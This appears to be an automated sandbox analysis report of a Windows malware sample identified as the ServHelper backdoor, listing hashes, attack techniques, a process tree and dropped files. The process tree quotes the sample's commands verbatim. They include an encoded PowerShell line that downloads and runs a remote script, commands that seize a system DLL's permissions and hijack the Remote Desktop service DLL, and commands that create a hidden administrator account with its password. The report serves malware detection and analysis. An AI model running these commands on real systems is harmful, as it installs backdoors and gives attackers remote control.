Analysis

  • max time kernel
    121s
  • max time network
    160s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    18-06-2021 09:05

General

  • Target

    6774f8a7d95a58ddab16d1c792ec846c.exe

  • Size

    4.5MB

  • MD5

    6774f8a7d95a58ddab16d1c792ec846c

  • SHA1

    562b99cee396d3d22dde68d9de09214dc32a0dd4

  • SHA256

    eb02c967fb3feaf5504a78de8a7e0513c2c4e52ddf2243bfbcb10e83954baaad

  • SHA512

    b3c7b9e46f6b5ccc513708729bd79b0ffab4605a9c4bbce0f5209574a83f68b2353c67b4731b0bdb5aa398f33dbe97c9bf46f54f0c0680e3f2b74c83e7657019

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 21 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6774f8a7d95a58ddab16d1c792ec846c.exe
    "C:\Users\Admin\AppData\Local\Temp\6774f8a7d95a58ddab16d1c792ec846c.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:304
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ase4anbu\ase4anbu.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:472
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES979E.tmp" "c:\Users\Admin\AppData\Local\Temp\ase4anbu\CSC7478FDF983D49C2B0504A7CD2196BF8.TMP"
          4⤵
            PID:624
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1660
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:740
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:928
        • C:\Windows\system32\takeown.exe
          "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:556
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1492
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:1668
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1036
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1752
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1628
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1600
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:964
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:920
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:1092
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:1544
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2020
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:268
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1536
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1388
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                      PID:1008
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start rdpdr
                        6⤵
                          PID:1224
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                    3⤵
                      PID:1520
                      • C:\Windows\system32\cmd.exe
                        cmd /c net start TermService
                        4⤵
                          PID:816
                          • C:\Windows\system32\net.exe
                            net start TermService
                            5⤵
                              PID:932
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 start TermService
                                6⤵
                                  PID:1512
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                            3⤵
                              PID:1380
                            • C:\Windows\system32\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                              3⤵
                                PID:1536
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe user WgaUtilAcc 000000 /del
                            1⤵
                              PID:1668
                              • C:\Windows\system32\net.exe
                                net.exe user WgaUtilAcc 000000 /del
                                2⤵
                                  PID:436
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                                    3⤵
                                      PID:568
                                • C:\Windows\System32\cmd.exe
                                  cmd /C net.exe user WgaUtilAcc 4qgCKHk1 /add
                                  1⤵
                                    PID:1628
                                    • C:\Windows\system32\net.exe
                                      net.exe user WgaUtilAcc 4qgCKHk1 /add
                                      2⤵
                                        PID:944
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 user WgaUtilAcc 4qgCKHk1 /add
                                          3⤵
                                            PID:1476
                                      • C:\Windows\System32\cmd.exe
                                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                        1⤵
                                          PID:1544
                                          • C:\Windows\system32\net.exe
                                            net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                            2⤵
                                              PID:1152
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                3⤵
                                                  PID:660
                                            • C:\Windows\System32\cmd.exe
                                              cmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
                                              1⤵
                                                PID:1008
                                                • C:\Windows\system32\net.exe
                                                  net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
                                                  2⤵
                                                    PID:1644
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
                                                      3⤵
                                                        PID:268
                                                  • C:\Windows\System32\cmd.exe
                                                    cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                    1⤵
                                                      PID:908
                                                      • C:\Windows\system32\net.exe
                                                        net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                        2⤵
                                                          PID:1668
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                            3⤵
                                                              PID:1048
                                                        • C:\Windows\System32\cmd.exe
                                                          cmd /C net.exe user WgaUtilAcc 4qgCKHk1
                                                          1⤵
                                                            PID:1220
                                                            • C:\Windows\system32\net.exe
                                                              net.exe user WgaUtilAcc 4qgCKHk1
                                                              2⤵
                                                                PID:1380
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 user WgaUtilAcc 4qgCKHk1
                                                                  3⤵
                                                                    PID:2020
                                                              • C:\Windows\System32\cmd.exe
                                                                cmd.exe /C wmic path win32_VideoController get name
                                                                1⤵
                                                                  PID:660
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic path win32_VideoController get name
                                                                    2⤵
                                                                    • Modifies data under HKEY_USERS
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:556
                                                                • C:\Windows\System32\cmd.exe
                                                                  cmd.exe /C wmic CPU get NAME
                                                                  1⤵
                                                                    PID:1388
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic CPU get NAME
                                                                      2⤵
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1092
                                                                  • C:\Windows\System32\cmd.exe
                                                                    cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                    1⤵
                                                                      PID:564
                                                                      • C:\Windows\system32\cmd.exe
                                                                        cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                        2⤵
                                                                          PID:876
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                            3⤵
                                                                            • Blocklisted process makes network request
                                                                            • Drops file in Windows directory
                                                                            • Modifies data under HKEY_USERS
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:912

                                                                      Network

                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                      Persistence

                                                                      Account Manipulation

                                                                      1
                                                                      T1098

                                                                      Registry Run Keys / Startup Folder

                                                                      1
                                                                      T1060

                                                                      Defense Evasion

                                                                      Modify Registry

                                                                      2
                                                                      T1112

                                                                      File Permissions Modification

                                                                      1
                                                                      T1222

                                                                      Lateral Movement

                                                                      Remote Desktop Protocol

                                                                      1
                                                                      T1076

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_26a29fde-79fc-46f5-92b7-460092013393
                                                                        MD5

                                                                        7f79b990cb5ed648f9e583fe35527aa7

                                                                        SHA1

                                                                        71b177b48c8bd745ef02c2affad79ca222da7c33

                                                                        SHA256

                                                                        080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

                                                                        SHA512

                                                                        20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_646d979f-9318-4d37-87aa-0377b341bd12
                                                                        MD5

                                                                        faa37917b36371249ac9fcf93317bf97

                                                                        SHA1

                                                                        a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

                                                                        SHA256

                                                                        b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

                                                                        SHA512

                                                                        614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_72df765f-d785-4f73-8caa-597f57942c44
                                                                        MD5

                                                                        2d5cd190b5db0620cd62e3cd6ba1dcd3

                                                                        SHA1

                                                                        ff4f229f4fbacccdf11d98c04ba756bda80aac7a

                                                                        SHA256

                                                                        ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

                                                                        SHA512

                                                                        edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_76949ea6-b080-42fe-9816-1d211c6af227
                                                                        MD5

                                                                        6f0d509e28be1af95ba237d4f43adab4

                                                                        SHA1

                                                                        c665febe79e435843553bee86a6cea731ce6c5e4

                                                                        SHA256

                                                                        f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

                                                                        SHA512

                                                                        8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c965c6d7-eab9-49db-bd5f-fb373792981f
                                                                        MD5

                                                                        e5b3ba61c3cf07deda462c9b27eb4166

                                                                        SHA1

                                                                        b324dad73048be6e27467315f82b7a5c1438a1f9

                                                                        SHA256

                                                                        b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

                                                                        SHA512

                                                                        a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e226eaac-a36d-42b8-97d8-da6253d4eebf
                                                                        MD5

                                                                        d89968acfbd0cd60b51df04860d99896

                                                                        SHA1

                                                                        b3c29916ccb81ce98f95bbf3aa8a73de16298b29

                                                                        SHA256

                                                                        1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

                                                                        SHA512

                                                                        b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f244096c-2a72-46ea-ab07-d23c34836843
                                                                        MD5

                                                                        a70ee38af4bb2b5ed3eeb7cbd1a12fa3

                                                                        SHA1

                                                                        81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

                                                                        SHA256

                                                                        dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

                                                                        SHA512

                                                                        8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                        MD5

                                                                        17e30f27446f60e9f2309a83f7cb6868

                                                                        SHA1

                                                                        77c8eed01e6157bd53e16352b56d1b4077769272

                                                                        SHA256

                                                                        8202b4884db0c5ae85cc2c30c4b87eae578e1d442b26abf747be94818576b368

                                                                        SHA512

                                                                        6cf03b507d762185fc3596cd55c2082ba390612f21cd20f01ab22b412814cefe8fa9046ca34bca6b390610899d1282e9f4ea9d0d668283a56b24eb64553cef09

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                        MD5

                                                                        8c252c9e759728ba4aaf283a4d336786

                                                                        SHA1

                                                                        5d1d622b9dddcadd87f69acc40b14f32182b22b3

                                                                        SHA256

                                                                        6d1c11cd4cd6e7d315a3d8b386ebaa9a94ab41fea0d5cdf4a96b848c56310bae

                                                                        SHA512

                                                                        ca693c293a089f555c80b54b22b9fcac7099abbf7d634e3fb787dc05beed6194ed73a3fe88c2997106d0d0c8b281c010ba1b65490c4919557dab710233e26627

                                                                      • C:\Users\Admin\AppData\Local\Temp\RES979E.tmp
                                                                        MD5

                                                                        d344c8ba103b3d09cad57c1a527a7b53

                                                                        SHA1

                                                                        c2ba8c34d7b4c0bf116268f121e37a24bfc8b3ae

                                                                        SHA256

                                                                        9a9663e37ba759d2cc54788a3fbddbc2959892131ed9439f7a895d6dede3b244

                                                                        SHA512

                                                                        2ac239f2c65b62a09b4501d01c31ea89e80c5af41cfacf7380c65c8c29af7645d90b513d7ba2756fdef625f4ecab7eb3afc9e3b336b853748c5e9655e5830f2b

                                                                      • C:\Users\Admin\AppData\Local\Temp\ase4anbu\ase4anbu.dll
                                                                        MD5

                                                                        9e38ba675012ebdce06b785f45bfdeca

                                                                        SHA1

                                                                        8396473114be0eca716fa4256e1d13e5cecdd576

                                                                        SHA256

                                                                        b4aca4d845fde1099708905b626130693dc9d4c56c09b1a4a84c61c1dccf35ba

                                                                        SHA512

                                                                        7ee6ce0002f5c3dc5c5fe40b998c3e2b6482aeb5393251a47bf0c7247e6d71272d239bf0934e746e21e66a84cc736ea3dd558f1364ab07f873b35919c6f9c896

                                                                      • C:\Users\Admin\AppData\Local\Temp\ready.ps1
                                                                        MD5

                                                                        3447df88de7128bdc34942334b2fab98

                                                                        SHA1

                                                                        519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

                                                                        SHA256

                                                                        9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

                                                                        SHA512

                                                                        2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

                                                                      • C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
                                                                        MD5

                                                                        89a9e4ab5bf64dc1ed74706ac08e931c

                                                                        SHA1

                                                                        4f23b20c3582fb6aec181ada0666fa962ba08920

                                                                        SHA256

                                                                        4bc2f766ee74799ed4f257cedc7ec3a726085a5e323f7183c49bd428181dfe11

                                                                        SHA512

                                                                        59ee5a1d966f528028525c7553ff3eae26e1be8bddb3d9fbcc973e6ce45b0af09fe8aaa5fbf550f1b33b6fd068625c62b27a7ff3b1a49d267ce0795a064cc41c

                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                        MD5

                                                                        ade742f9253f6910d8cfd2a45a21a327

                                                                        SHA1

                                                                        17ed5cd82c4a0cfda8d2a4fec794c206e1ee69cf

                                                                        SHA256

                                                                        44d1e1e43afbe6230b373c10ef38a9471481a6a87c63dff97a07e11e632732cc

                                                                        SHA512

                                                                        2794c878b56858ddeb7c5dec6a1139f66c94f908ae2ff46c488317ae79c228548d4c31092dc669e67abfa158a25d2ca5ed28bb82c15cb79c0a245b1d16f0deee

                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                        MD5

                                                                        ade742f9253f6910d8cfd2a45a21a327

                                                                        SHA1

                                                                        17ed5cd82c4a0cfda8d2a4fec794c206e1ee69cf

                                                                        SHA256

                                                                        44d1e1e43afbe6230b373c10ef38a9471481a6a87c63dff97a07e11e632732cc

                                                                        SHA512

                                                                        2794c878b56858ddeb7c5dec6a1139f66c94f908ae2ff46c488317ae79c228548d4c31092dc669e67abfa158a25d2ca5ed28bb82c15cb79c0a245b1d16f0deee

                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                        MD5

                                                                        ade742f9253f6910d8cfd2a45a21a327

                                                                        SHA1

                                                                        17ed5cd82c4a0cfda8d2a4fec794c206e1ee69cf

                                                                        SHA256

                                                                        44d1e1e43afbe6230b373c10ef38a9471481a6a87c63dff97a07e11e632732cc

                                                                        SHA512

                                                                        2794c878b56858ddeb7c5dec6a1139f66c94f908ae2ff46c488317ae79c228548d4c31092dc669e67abfa158a25d2ca5ed28bb82c15cb79c0a245b1d16f0deee

                                                                      • C:\Windows\system32\rfxvmt.dll
                                                                        MD5

                                                                        dc39d23e4c0e681fad7a3e1342a2843c

                                                                        SHA1

                                                                        58fd7d50c2dca464a128f5e0435d6f0515e62073

                                                                        SHA256

                                                                        6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                                                        SHA512

                                                                        5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                                                      • \??\PIPE\lsarpc
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\PIPE\lsarpc
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\PIPE\lsarpc
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\PIPE\samr
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\PIPE\samr
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\PIPE\wkssvc
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\ase4anbu\CSC7478FDF983D49C2B0504A7CD2196BF8.TMP
                                                                        MD5

                                                                        571efcc60aa2c74066844cb30e6ab170

                                                                        SHA1

                                                                        fb75c8e4f16bc9140373b6b9324ec31b43b4d1b9

                                                                        SHA256

                                                                        73373cbd8a5a0eb8a32e8a453318da9b4c2341cd89443f5b407a57b0d2f2a847

                                                                        SHA512

                                                                        7306324d97b04f7a414be462a341d8abe96555ac63182e3b1f90ec40005ff36628333caa55db41800e70018b3da28bab6b58b3b1b3a7fae2998845ac3d21c9e4

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\ase4anbu\ase4anbu.0.cs
                                                                        MD5

                                                                        4864fc038c0b4d61f508d402317c6e9a

                                                                        SHA1

                                                                        72171db3eea76ecff3f7f173b0de0d277b0fede7

                                                                        SHA256

                                                                        0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

                                                                        SHA512

                                                                        9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\ase4anbu\ase4anbu.cmdline
                                                                        MD5

                                                                        218472de2495ffa75f797215491e8333

                                                                        SHA1

                                                                        f070d1aecc2eb78010e4cfde5bf694d1d74e20ca

                                                                        SHA256

                                                                        494b6c5cc029dfb27d3bd27143fe5ebe71187fb48da19261e7c73c4aeec449ec

                                                                        SHA512

                                                                        33e41ff791fc7398715b2f13e5d037d848d5b921700a754aa9de1b3a5cad3811627b33bd617b4f5e2469c3f0030c9778abc1bd6305645197222a06a795b68efa

                                                                      • \Windows\Branding\mediasrv.png
                                                                        MD5

                                                                        da10ad3309976b3094f78e96d9c95032

                                                                        SHA1

                                                                        aa3ea0d789100d7f2081f8faaad9cdf0f511dee6

                                                                        SHA256

